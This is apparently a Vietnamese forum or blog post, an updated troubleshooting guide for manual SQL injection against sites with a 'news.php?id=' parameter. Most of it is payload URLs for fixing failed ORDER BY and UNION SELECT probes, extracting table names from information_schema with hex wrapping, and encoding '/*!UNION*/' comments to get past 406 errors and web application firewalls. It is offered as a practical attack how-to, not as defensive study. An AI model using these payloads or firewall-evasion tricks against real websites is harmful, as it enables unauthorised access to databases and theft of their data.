[UPDATE] Một số vấn đề và hướng giải quyết
ORDER BY
- Khi order by ko hoạt động
Code:
site.com/news.php?id=9 order by 10000000000-- [No Error]
Cách giải quyết: Thêm ' vào sau tham số ID và thêm + vào cuối link
Code:
site.com/news.php?id=9' order by 10000000--+[Error]
UNION SELECT
- Khi ko thấy số column bị lỗi hiện ra
Code:
site.com/news.php?id=9 union select 1,2,3,4,5--
Cách giải quyết: Thay tham số bằng null
Code:
ite.com/news.php?id=null union select 1,2,3,4,5--
-Khi xuất hiện lỗi "The used SELECT statements have a different number of columns"
Cách giải quyết: thêm vào sau tham số id
Code:
ite.com/news.php?id=18+and+1=0+union select+1,2,3,4,5
Gặp lỗi khi extract tables
- Ko lấy đc table
Code:
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4,5
from information_schema.tables where table_schema=database()--
Cách giải quyết: Thêm unhex(hex( trước group_concat
Code:
site.com/news.php?id=9 union select
1,2,unhex(hex(group_concat(table_name))),4,5 from
information_schema.tables where table_schema=database()--
RaZoR Updated:
Bypass 406 - Not Acceptable
Như nhokpro888 hỏi, vì sao ngta ghi /*! Union */ thay vì ghi bình thường.
Nếu RZ ko lầm, /* .....*/ có nghĩa là mark as comment ( đánh chú thích ), ! có nghĩa là phủ định.
Phủ định của chú thích sẽ là query bình thường
Bypass WAF/Web application firewall
Khi vào đc đến đây:
Code:
http://www.site.com/index.php?id=-1 union select 1,2,3,4,5--
Gặp lỗi sau:
Code:
"404 forbidden you do not have permission to access to this webpage"
hoặc Not acceptable j đó
Hướng giải quyết:
Code:
http://www.site.com/index.php?id=-1+%2F%2A%21UNION%2A%2F+%2F%2A%21SELECT%2A%2F1%2C2%2C3%2C4%2C5--
Hiện tại SF chỉ viết đc đến đây, sẽ hoàn thiện dần dần các vấn đề về SQLi tại đây.
Có sai sót hay thiếu j thì RaZor sẽ bổ sung ở đây nhé...
Không có nhận xét nào:
Đăng nhận xét